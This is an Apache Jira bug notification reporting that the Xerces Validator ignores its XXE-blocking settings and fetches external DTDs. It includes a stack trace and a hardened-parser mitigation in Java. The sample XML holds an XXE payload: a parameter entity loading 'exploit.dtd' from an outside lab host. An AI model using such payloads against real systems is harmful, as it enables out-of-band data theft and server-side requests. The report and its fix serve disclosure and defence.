[ 
https://issues.apache.org/jira/browse/XERCESJ-1758?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Samuel Hailemichael updated XERCESJ-1758:
-----------------------------------------
    Description: 
During the implementation of a Validator using Apache Xerces, setting the features 
that prevent XML External Entities (XXE) is not working. When parsing an XML 
file, I consistently get DNS callbacks when attempting to load an external DTD 
with a DOCTYPE declaration. I am using the latest Xerces version (2.12.2).

*Attempt 1*
{code:java}
SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
Schema schema = factory.newSchema(schemaSources);
Validator validator = schema.newValidator();

validator.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
validator.setFeature("http://xml.org/sax/features/external-general-entities", false);
validator.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

validator.validate(new StreamSource(new ByteArrayInputStream(<xml file in byte array form that contains DOCTYPE>)));
{code}
Sample XML file:
{code:xml}
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd">
 %xxe;]>
{code}
When using a Validator, it doesn't throw a fatal error exception when a document 
containing a DOCTYPE declaration is parsed. Here's an example of an 
outbound call made when an XML file containing a DOCTYPE declaration is parsed 
through the validator.
{code:java}
Caused by: java.io.IOException: Server returned HTTP response code: 403 for URL: https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd
        at sun.net.www.protocol.http.HttpURLConnection.getInputStream0(HttpURLConnection.java:1914)
        at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1512)
        at sun.net.www.protocol.https.HttpsURLConnectionImpl.getInputStream(HttpsURLConnectionImpl.java:268)
        at org.apache.xerces.impl.XMLEntityManager.setupCurrentEntity(Unknown Source)
        at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
        at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
        at org.apache.xerces.impl.XMLDTDScannerImpl.startPE(Unknown Source)
        at org.apache.xerces.impl.XMLDTDScannerImpl.skipSeparator(Unknown Source)
        at org.apache.xerces.impl.XMLDTDScannerImpl.scanDecls(Unknown Source)
        at org.apache.xerces.impl.XMLDTDScannerImpl.scanDTDInternalSubset(Unknown Source)
        at org.apache.xerces.impl.XMLDocumentScannerImpl$DTDDispatcher.dispatch(Unknown Source)
        at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown Source)
        at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
        at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
        at org.apache.xerces.jaxp.validation.StreamValidatorHelper.validate(Unknown Source)
        at org.apache.xerces.jaxp.validation.ValidatorImpl.validate(Unknown Source)
        at javax.xml.validation.Validator.validate(Validator.java:124)
{code}
Instead of an outbound call, it should throw an exception for a DOCTYPE 
declaration in the XML file.

*Attempt 2*
{code:java}
SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
Schema schema = factory.newSchema();
Validator validator = schema.newValidator();
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
validator.validate(new StreamSource(new ByteArrayInputStream(<byte array>)));
{code}
This implementation is the recommended way to prevent external entity processing in 
validators (see 
https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#validator), 
but it gives this error when implemented with Xerces:
{code:java}
org.xml.sax.SAXNotRecognizedException: Property 'http://javax.xml.XMLConstants/property/accessExternalDTD' is not recognized.
    at org.apache.xerces.jaxp.validation.ValidatorImpl.setProperty(Unknown Source)
{code}
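The trace in the report shows that with a StreamSource the validator parses the document itself (StreamValidatorHelper calling XML11Configuration.parse), which is where the DOCTYPE and its parameter entity get resolved. A mitigation that does not depend on ValidatorImpl honouring the features or the ACCESS_EXTERNAL_* properties is to parse the input first with a DocumentBuilder configured to reject any DOCTYPE (a setting DocumentBuilderFactory does honour), and then hand the resulting DOM to the validator as a DOMSource, so the validator never scans raw markup. The following is an added example written for this page, not code from the reporter or the Xerces project; the one-element schema, the two sample documents and the class name HardenedValidation are constructed for illustration.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.transform.dom.DOMSource;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

/** Added example (hypothetical class name): parse with a hardened builder, then validate the DOM. */
public class HardenedValidation {

    /** DocumentBuilder that refuses any DOCTYPE, so no external DTD or entity is ever fetched. */
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Fail fast on the DOCTYPE itself; the parser stops before any entity resolution.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case a DOCTYPE were ever allowed through.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf.newDocumentBuilder();
    }

    /** Parse the bytes with the hardened builder, then validate the DOM tree (not the raw stream). */
    static void parseThenValidate(byte[] xml, Schema schema)
            throws ParserConfigurationException, SAXException, IOException {
        Document doc = hardenedBuilder().parse(new ByteArrayInputStream(xml));
        Validator validator = schema.newValidator();
        validator.validate(new DOMSource(doc));
    }

    public static void main(String[] args) throws Exception {
        // Constructed schema: a single <foo> element with string content.
        String xsd = "<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">"
                   + "<xs:element name=\"foo\" type=\"xs:string\"/></xs:schema>";
        SchemaFactory sf = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
        Schema schema = sf.newSchema(
                new StreamSource(new ByteArrayInputStream(xsd.getBytes(StandardCharsets.UTF_8))));

        // Constructed inputs: one clean document and one carrying a DOCTYPE declaration.
        byte[] clean = "<?xml version=\"1.0\"?><foo>ok</foo>".getBytes(StandardCharsets.UTF_8);
        byte[] withDoctype = "<?xml version=\"1.0\"?><!DOCTYPE foo><foo>ok</foo>"
                .getBytes(StandardCharsets.UTF_8);

        parseThenValidate(clean, schema);
        System.out.println("clean document: valid");

        try {
            parseThenValidate(withDoctype, schema);
            System.out.println("UNEXPECTED: document with DOCTYPE was accepted");
        } catch (SAXException e) {
            // Expected: the hardened parser rejects the DOCTYPE before validation starts,
            // so there is no outbound request regardless of what the Validator supports.
            System.out.println("document with DOCTYPE rejected: " + e.getMessage());
        }
    }
}
```

The point of the design is that the component doing the parsing is the one whose XXE settings are known to be honoured; the validator only ever sees an already-built tree. A SAXSource wrapping an XMLReader hardened the same way is an equivalent alternative when building a DOM is too costly for large inputs.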
 

 


> XML validator xxe vulnerability
> -------------------------------
>
>                 Key: XERCESJ-1758
>                 URL: https://issues.apache.org/jira/browse/XERCESJ-1758
>             Project: Xerces2-J
>          Issue Type: Bug
>          Components: JAXP (javax.xml.validation)
>            Reporter: Samuel Hailemichael
>            Priority: Major
>

--
This message was sent by Atlassian Jira
(v8.20.10#820010)
